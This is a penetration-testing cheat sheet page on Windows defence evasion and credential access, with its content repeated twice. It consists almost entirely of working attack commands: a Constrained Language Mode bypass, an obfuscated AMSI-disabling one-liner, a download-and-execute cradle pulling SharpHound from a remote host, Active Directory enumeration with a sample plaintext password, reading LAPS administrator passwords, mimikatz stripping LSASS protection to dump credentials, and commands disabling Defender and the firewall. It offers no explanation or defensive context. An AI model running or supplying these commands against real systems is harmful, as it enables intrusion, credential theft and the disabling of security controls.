Application Whitelisting & Credentials

CLM

Check CLM

$ExecutionContext.SessionState.LanguageMode

Bypass CLM

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U "C:\Windows\Tasks\clm.exe"

AMSI

Check AMSI

'amsiutils'

Disable AMSI

$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Failed") {$f=$e}};$f.SetValue($null,$true)

Enumerate Domain

iex (new-object net.webclient).downloadstring("http://192.168.x.y/tools/sharphound.ps1")
Invoke-BloodHound -CollectionMethod All -Verbose

SharpHound.exe -c All,GPOLocalGroup,LoggedOn --domain final.com --ldapusername nina --ldappassword 'PasswordRulon123!'

ipmo .\adpeas.ps1

Invoke-adPEAS

LAPS

Check LAPS

ipmo powerview.ps1

get-netcomputer -Filter "(ms-mcs-admpwdexpirationtime=*)" | select dnshostname

Read Password

ipmo powerview.ps1

get-netcomputer -Filter "(ms-mcs-admpwd=*)" | select dnshostname,ms-mcs-admpwd

AppLocker

Check AppLocker

Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Exe

Bypass AppLocker

PPL

Check PPL

Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name "RunAsPPL"

Remove PPL

mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe  /remove" "sekurlsa::logonpasswords"exit

Shutdown AV and Firewall

In PowerShell

Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true

netsh advfirewall set allprofiles state off

In RDP

Manually shut down WD.

PreviousSQL Server Instance NextLocal Reconnaissance Linux

Last updated 1 year ago

Application Whitelisting & Credentials

CLM

Check CLM

$ExecutionContext.SessionState.LanguageMode

Bypass CLM

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U "C:\Windows\Tasks\clm.exe"

AMSI

Check AMSI

'amsiutils'

Disable AMSI

$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Failed") {$f=$e}};$f.SetValue($null,$true)

Enumerate Domain

iex (new-object net.webclient).downloadstring("http://192.168.x.y/tools/sharphound.ps1")
Invoke-BloodHound -CollectionMethod All -Verbose

SharpHound.exe -c All,GPOLocalGroup,LoggedOn --domain final.com --ldapusername nina --ldappassword 'PasswordRulon123!'

ipmo .\adpeas.ps1

Invoke-adPEAS

LAPS

Check LAPS

ipmo powerview.ps1

get-netcomputer -Filter "(ms-mcs-admpwdexpirationtime=*)" | select dnshostname

Read Password

ipmo powerview.ps1

get-netcomputer -Filter "(ms-mcs-admpwd=*)" | select dnshostname,ms-mcs-admpwd

AppLocker

Check AppLocker

Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Exe

Bypass AppLocker

PPL

Check PPL

Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name "RunAsPPL"

Remove PPL

mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe  /remove" "sekurlsa::logonpasswords"exit

Shutdown AV and Firewall

In PowerShell

Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true

netsh advfirewall set allprofiles state off

In RDP

Manually shut down WD.

PreviousSQL Server Instance NextLocal Reconnaissance Linux

Last updated 1 year ago